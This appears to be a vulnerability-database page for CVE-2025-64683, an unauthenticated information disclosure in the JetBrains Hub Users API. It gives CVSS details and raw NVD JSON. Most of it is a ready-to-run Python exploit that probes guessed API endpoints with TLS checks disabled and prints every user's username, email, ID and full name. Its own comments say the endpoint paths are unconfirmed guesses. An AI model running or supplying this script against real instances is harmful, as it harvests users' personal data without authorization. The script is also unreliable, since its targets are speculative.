Security Vulnerability Report
CVE-2025-64683 CVSS 5.3 MEDIUM

CVE-2025-64683

Published: 2025-11-10 14:15:44
Last Modified: 2025-11-21 16:09:49

Description

In JetBrains Hub before 2025.3.104432, information disclosure was possible via the Users API.

CVSS Details

CVSS Score
5.3 (JetBrains' Secondary assessment; the NVD Primary assessment in the raw JSON below scores the same vector with C:H at 7.5 HIGH)
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:jetbrains:hub:*:*:*:*:*:*:*:* - VULNERABLE
JetBrains Hub < 2025.3.104432

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
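import requests
import json

# CVE-2025-64683 PoC - JetBrains Hub Users API Information Disclosure
# Target: JetBrains Hub < 2025.3.104432
# Author: Security Researcher
# Date: 2025-11-10
#
# NOTE(review): the vendor advisory names only "the Users API"; the three
# endpoint paths tried below are not confirmed by it and should be treated
# as guesses — a negative result from this script is not proof that an
# instance is fixed. Remediation is upgrading to 2025.3.104432 or later;
# for detection, an unauthenticated request to the Users API that is
# answered with HTTP 200 and a JSON body is the event worth alerting on.


def check_vulnerability(target_url):
    """
    Check if target JetBrains Hub instance is vulnerable to CVE-2025-64683.

    Args:
        target_url: base URL of the Hub instance; a trailing slash is
            tolerated.

    Returns:
        True as soon as one candidate endpoint answers HTTP 200 with a JSON
        body that is a list or whose text mentions "user"; False when no
        endpoint does. Every outcome is also reported on stdout.
    """
    print(f"[*] Checking target: {target_url}")
    # Target Users API endpoint
    endpoints = [
        "/api/users",
        "/rest/user/users",
        "/api/v1/users",
    ]
    base = target_url.rstrip('/')
    for endpoint in endpoints:
        url = base + endpoint
        print(f"\n[*] Testing endpoint: {url}")
        try:
            # Send unauthenticated request to Users API.
            # verify=False turns off TLS certificate validation, so a
            # "vulnerable" verdict may come from an interposed host rather
            # than the real instance; kept as in the original PoC, but
            # bear it in mind when interpreting results.
            response = requests.get(url, timeout=10, verify=False)
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
            continue
        if response.status_code == 200:
            # A 200 that is not JSON (e.g. a login page) is not evidence of
            # disclosure; the original bare `except: pass` hid every error
            # here, this only skips the undecodable body.
            try:
                data = response.json()
            except ValueError:
                continue
            if data and (isinstance(data, list) or 'user' in str(data).lower()):
                print(f"[+] VULNERABLE! Information disclosure detected at {url}")
                print(f"[+] Response preview: {json.dumps(data, indent=2)[:500]}")
                return True
        elif response.status_code in (401, 403):
            print(f"[-] Endpoint requires authentication (HTTP {response.status_code})")
        else:
            print(f"[-] Unexpected response (HTTP {response.status_code})")
    print("\n[-] Target does not appear to be vulnerable to CVE-2025-64683")
    return False


def exploit_information_disclosure(target_url):
    """
    Exploit CVE-2025-64683 to extract user information.

    Args:
        target_url: base URL of the Hub instance; a trailing slash is
            tolerated.

    Returns:
        The decoded JSON list returned by /api/users on HTTP 200, or None
        when the request fails, the status is not 200, or the body is not
        a JSON list.
    """
    print(f"\n[+] Exploiting CVE-2025-64683 on {target_url}")
    url = target_url.rstrip('/') + '/api/users'
    try:
        # Unauthenticated request to Users API (TLS validation disabled,
        # same caveat as in check_vulnerability).
        response = requests.get(url, timeout=10, verify=False)
        if response.status_code != 200:
            print(f"[-] Failed to retrieve users (HTTP {response.status_code})")
            return None
        users = response.json()
        if not isinstance(users, list):
            # len()/.get() below assume a list of objects; report an
            # unexpected shape instead of letting it surface as a generic
            # "Exploit failed".
            print(f"[-] Unexpected response body type: {type(users).__name__}")
            return None
        print(f"\n[+] Successfully retrieved {len(users)} user records:")
        for i, user in enumerate(users, 1):
            if not isinstance(user, dict):
                # Non-object entries have no fields to read; print N/A.
                user = {}
            print(f"\n[User {i}]")
            print(f" Username: {user.get('username', 'N/A')}")
            print(f" Email: {user.get('email', 'N/A')}")
            print(f" User ID: {user.get('id', 'N/A')}")
            print(f" Full Name: {user.get('fullName', 'N/A')}")
        return users
    except (requests.exceptions.RequestException, ValueError) as e:
        # Network/HTTP errors and undecodable JSON; narrower than the
        # original `except Exception`, which also hid programming errors.
        print(f"[-] Exploit failed: {e}")
        return None


if __name__ == "__main__":
    import sys

    if len(sys.argv) < 2:
        print("Usage: python cve-2025-64683.py <target_url>")
        print("Example: python cve-2025-64683.py https://hub.example.com")
        sys.exit(1)
    target = sys.argv[1]
    check_vulnerability(target)
    # Uncomment to extract user data:
    # exploit_information_disclosure(target)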

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64683", "sourceIdentifier": "[email protected]", "published": "2025-11-10T14:15:43.760", "lastModified": "2025-11-21T16:09:48.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In JetBrains Hub before 2025.3.104432 information disclosure was possible via the Users API"}, {"lang": "es", "value": "En JetBrains Hub antes de 2025.3.104432 la revelación de información era posible a través de la API de Usuarios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-362"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jetbrains:hub:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.3.104432", "matchCriteriaId": "8A004A90-824E-4528-AEF7-F000D4C968FB"}]}]}], "references": [{"url": 
"https://www.jetbrains.com/privacy-security/issues-fixed/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}